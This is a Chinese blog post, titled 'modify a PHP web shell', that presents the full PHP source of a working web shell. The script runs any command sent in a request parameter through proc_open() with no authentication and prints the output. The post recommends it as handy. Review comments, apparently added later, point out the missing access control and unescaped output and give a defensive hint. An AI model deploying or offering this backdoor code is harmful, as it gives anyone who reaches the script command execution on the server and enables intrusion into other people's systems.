
[置顶] 改一个PHP WEB SHELL

2016-08-25 17:02 204 查看
<?php
// Platform switch read by Webshell::_exec(): a truthy value sends command output
// through GBK2UTF8() before it is stored in the transcript.
define('WINDOWS', 1);
/**
 * Re-encode a GBK byte string as UTF-8 when the iconv extension is loaded.
 *
 * Values that empty() treats as empty (null, '', '0', ...) are returned untouched,
 * as is any value when iconv() is unavailable. The result of iconv() is passed
 * straight through, so a failed conversion surfaces as iconv()'s own return value.
 *
 * @param string|null $text Bytes assumed to be GBK-encoded.
 * @return mixed The converted string, or the input unchanged.
 */
function GBK2UTF8($text = null)
{
    if (empty($text) || !function_exists('iconv')) {
        return $text;
    }

    return iconv('GBK', 'UTF-8', $text);
}

/**
 * Trim a block of text and collapse runs of blank or whitespace-only lines
 * into a single "\n".
 *
 * Any falsy input (null, '', '0', ...) yields the empty string.
 *
 * @param string|null $str Text to tidy.
 * @return string|null Result of preg_replace(), or '' for falsy input.
 */
function remove_blanklines($str)
{
    if (!$str) {
        return '';
    }

    $trimmed = trim($str);

    return preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $trimmed);
}
/**
 * Session-backed command console: takes a command string from the HTTP request,
 * runs it on the host through proc_open() and prints the accumulated transcript.
 *
 * NOTE(review): nothing in this class authenticates or authorises the caller, and
 * the request value reaches proc_open() unmodified, so any client that can reach
 * this script runs commands with the privileges of the web-server account.
 * For defenders the recognisable pattern is a request parameter flowing into
 * proc_open(); listing proc_open in php.ini's disable_functions prevents the
 * command from being spawned.
 *
 * NOTE(review): ereg() was removed in PHP 7.0 and curly-brace string offsets
 * ($regs[1]{0}) in PHP 8.0, so this file only runs on older interpreters.
 *
 * NOTE(review): no session_start() call is visible in this listing; unless sessions
 * are started elsewhere (or session.auto_start is on) the $_SESSION state used
 * below would not persist between requests - confirm.
 */
class Webshell {

/* Holds the 'home-directory' setting; stays null until __init__() runs. */
private $default_settings = null ;

/**
 * Reset the per-session state (working directory, history, transcript).
 *
 * This is not PHP's constructor (that would be __construct); it only runs
 * when run() calls it explicitly.
 */
function __init__(){
$this->default_settings = array('home-directory'   => '.');
$_SESSION['cwd'] = realpath($this->default_settings['home-directory']);
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}

/**
 * Handle one request: initialise the session state if needed, then execute
 * the 'command' request parameter when it is non-empty.
 */
function run(){
if (empty($_SESSION['cwd'])) {
$this->__init__();
}
/* $_REQUEST merges query-string, POST and (depending on php.ini) cookie values,
 * so the command does not have to appear in the URL; access logs that record
 * only the request line will not show POST- or cookie-borne values. */
$command = $_REQUEST['command'] ;
if (!empty($command)){
$command = trim($command);
$this->_exec($command);
}
}

/**
 * Record the command in the session history, handle 'cd' internally or run
 * anything else through proc_open(), then echo the whole transcript.
 *
 * @param string $command Command line taken from the request by run().
 */
function _exec($command){
if (!empty($command)) {
/* Move a repeated command to the front of the history instead of duplicating it. */
if (($i = array_search($command, $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);

array_unshift($_SESSION['history'], $command);

/* NOTE(review): the command text is appended to the transcript without
 * htmlspecialchars(), unlike the command output below, and the transcript is
 * echoed inside <PRE> at the end of this method - markup in the request value
 * is therefore emitted to the page as-is. */
$_SESSION['output'] .= (empty($_SESSION['output'])?'':"\n\n") . "$ {$command}\n" ;

/* Initialize the current working directory. */
/* NOTE(review): default_settings is only populated by __init__(); on a request
 * where run() skipped __init__() it is still null at this point. */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) {
$_SESSION['cwd'] = realpath($this->default_settings['home-directory']);
}
elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */

if ($regs[1]{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}

/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);

/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);

/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
/* The @ suppresses chdir()'s warning; failure is reported through the transcript
 * instead. The message below is appended without htmlspecialchars(). */
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}

}
else {

// We cannot use putenv() in safe mode.
// (safe_mode itself was removed in PHP 5.4.)
if (!ini_get('safe_mode')) {
// Advise programs (ls for example) of the terminal size.
putenv('ROWS=' . 80);
putenv('COLUMNS=' . 600);
}

$shell_result = '' ;
$io = array();
/* The request-supplied string is handed to proc_open() as the command line,
 * with stdout (1) and stderr (2) captured through pipes and the session's
 * working directory as cwd. No allow-list or filtering is applied first. */
$p = proc_open($command,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io,$_SESSION['cwd']);

/* Read output sent to stdout. */
while (!feof($io[1])) {
$shell_result .= htmlspecialchars(fgets($io[1]));
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$shell_result .= htmlspecialchars(fgets($io[2]));
}

fclose($io[1]);
fclose($io[2]);
proc_close($p);

/* WINDOWS is defined as 1 at the top of the file, so the GBK conversion always applies. */
$shell_result = (WINDOWS)? GBK2UTF8($shell_result):$shell_result;
$shell_result = remove_blanklines($shell_result);

$_SESSION['output'] .= $shell_result;

}
}

/* Build the command history for use in the JavaScript */
/* NOTE(review): $js_command_hist is assigned here but never read in this listing. */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}

/* Emit the full session transcript; runs even when $command was empty. */
echo "<PRE>{$_SESSION['output']}</PRE>" ;
}
}

// Entry point: executes on every request to this file. No access check of any
// kind sits in front of run(), so reaching the URL is sufficient to use the console.
$inst = new Webshell();
$inst->run();

 
很好用

 



 

 






